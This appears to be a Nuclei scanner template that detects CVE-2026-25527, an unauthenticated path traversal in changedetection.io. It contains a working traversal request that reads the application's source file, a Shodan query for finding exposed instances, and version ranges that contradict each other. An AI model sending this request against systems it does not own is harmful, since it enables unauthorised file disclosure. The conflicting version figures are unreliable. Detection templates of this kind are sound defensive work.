id: CVE-2026-25527 info: name: changedetection.io <= 0.52.9 - Unauthenticated Path Traversal author: WRG-11 severity: medium description: | changedetection.io <= 0.53.9 contains a path traversal caused by improper validation of the 'group' parameter in /static// route, letting unauthenticated attackers read local application source files. impact: | Unauthenticated attackers can read local application source files, potentially exposing sensitive information. remediation: | Upgrade to version 0.53.2 or later. reference: - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-9jj8-v89v-xjvw - https://nvd.nist.gov/vuln/detail/CVE-2026-25527 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2026-25527 epss-score: 0.0092 epss-percentile: 0.56566 cwe-id: CWE-22 metadata: verified: true max-request: 1 vendor: dgtlmoon product: changedetection.io shodan-query: http.html:"changedetection.io" tags: cve,cve2026,changedetection,lfi,traversal,unauth,exposure http: - raw: - | GET /static/%2e%2e/flask_app.py HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "from changedetectionio", "def static_content(")' - 'contains(content_type, "text/x-python")' condition: and # digest: 4a0a00473045022100f69c1536b8eefad65cf36d83dd24c09a7d26edc9a7a534ec37d4d081306bbb70022041796babb8b1015bfbb7610d61fe932d4aade3410215b5eba5016fc15c191bab:922c64590222798bb761d5b6d8e72950